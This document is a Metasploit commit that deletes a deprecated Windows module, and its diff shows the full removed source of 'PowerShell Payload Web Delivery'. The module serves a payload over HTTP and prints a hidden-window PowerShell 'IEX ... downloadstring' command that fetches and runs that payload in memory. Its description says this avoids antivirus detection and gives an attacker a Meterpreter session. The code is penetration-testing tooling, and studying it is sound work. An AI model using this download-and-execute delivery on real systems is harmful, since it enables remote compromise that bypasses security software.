Move modules/exploits/windows/misc/psh_web_delivery.rb

This module was scheduled to be removed on 10/23/2014. Please use exploit/multi/script/web_delivery instead.
2015-01-26 00:28:40 -06:00 · 2015-01-26 00:28:40 -06:00 · f5916eba6d
parent bbcc2eb07d
commit f5916eba6d
1 changed files with 0 additions and 77 deletions
--- a/modules/exploits/windows/misc/psh_web_delivery.rb
+++ b/modules/exploits/windows/misc/psh_web_delivery.rb
@ -1,77 +0,0 @@
-##
-# This module requires Metasploit: http://metasploit.com/download
-# Current source: https://github.com/rapid7/metasploit-framework
-##
-
-require 'msf/core'
-require 'msf/core/exploit/powershell'
-
-class Metasploit3 < Msf::Exploit::Remote
-  Rank = NormalRanking
-
-  include Msf::Exploit::Remote::HttpServer
-  include Msf::Exploit::Powershell
-
-  include Msf::Module::Deprecated
-
-  DEPRECATION_DATE = Date.new(2014, 10, 23)
-  DEPRECATION_REPLACEMENT = 'exploit/multi/script/web_delivery'
-
-  def initialize(info = {})
-    super(update_info(info,
-      'Name' => 'PowerShell Payload Web Delivery',
-      'Description' => %q{
-        This module quickly fires up a web server that serves the payload in PowerShell.
-        The provided command will start PowerShell and then download and execute the
-        payload. The IEX command can also be extracted to execute directly from PowerShell.
-        The main purpose of this module is to quickly establish a session on a target
-        machine when the attacker has to manually type in the command himself, e.g. RDP
-        Session, Local Access or maybe Remote Command Exec. This attack vector does not
-        write to disk so is less likely to trigger AV solutions and will allow privilege
-        escalations supplied by Meterpreter.
-      },
-      'License' => MSF_LICENSE,
-      'Author' =>
-        [
-          'Ben Campbell',
-          'Chris Campbell' #@obscuresec - Inspiration n.b. no relation!
-        ],
-      'References' =>
-        [
-          [ 'URL', 'http://www.pentestgeek.com/2013/07/19/invoke-shellcode/' ],
-          [ 'URL', 'http://www.powershellmagazine.com/2013/04/19/pstip-powershell-command-line-switches-shortcuts/'],
-          [ 'URL', 'http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html']
-        ],
-      'Platform' => 'win',
-      'Targets' =>
-        [
-          [ 'Automatic', { 'Arch' => [ARCH_X86, ARCH_X86_64] } ]
-        ],
-      'DefaultTarget' => 0,
-      'DisclosureDate' => 'Jul 19 2013'))
-  end
-
-  def on_request_uri(cli, request)
-    print_status("Delivering Payload")
-
-    psh = cmd_psh_payload(payload.encoded,
-                          payload_instance.arch.first,
-                          {
-                              :remove_comspec => true,
-                              :use_single_quotes => true
-                          })
-    send_response(cli, psh, { 'Content-Type' => 'application/octet-stream' })
-  end
-
-  def primer
-    url = get_uri()
-    download_and_run = "IEX ((new-object net.webclient).downloadstring('#{url}'))"
-    print_status("Run the following command on the target machine:")
-    print_line generate_psh_command_line({
-                                     :noprofile => true,
-                                     :windowstyle => 'hidden',
-                                     :command => download_and_run
-                                 })
-  end
-end
-